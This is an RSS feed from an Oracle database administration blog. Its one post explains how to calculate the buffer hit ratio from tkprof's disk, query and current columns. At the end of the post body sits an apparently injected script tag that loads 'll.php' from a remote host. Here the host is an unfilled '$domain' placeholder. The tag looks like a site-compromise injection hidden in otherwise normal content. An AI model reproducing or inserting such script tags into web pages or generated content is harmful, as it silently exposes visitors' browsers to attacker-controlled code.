<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Database optimization</title>
	<atom:link href="http://www.bestremotedba.com/topics/database-administration/database-optimization/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to Calculate Hit Ratio from Tkprof output</title>
		<link>http://www.bestremotedba.com/how-to-calculate-hit-ratio-from-tkprof-output/</link>
		<comments>http://www.bestremotedba.com/how-to-calculate-hit-ratio-from-tkprof-output/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 00:05:20 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database optimization]]></category>
		<category><![CDATA[Hit Ratio from TKProf]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=74</guid>
		<description><![CDATA[How to Calculate Hit Ratio from Tkprof output]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p> Tkprof will have three fields in output<br />
1. Disk<br />
2. Query<br />
3. Current<br />
Generally hit ratio is calculated like as follows<br />
 Hit Ratio = 1 – (Physical Reads/Logical Reads)</p>
<p>Physical Reads = Sum (Disk)<br />
Logical Reads  = Sum (Query) + Sum (Current)<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/how-to-calculate-hit-ratio-from-tkprof-output/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

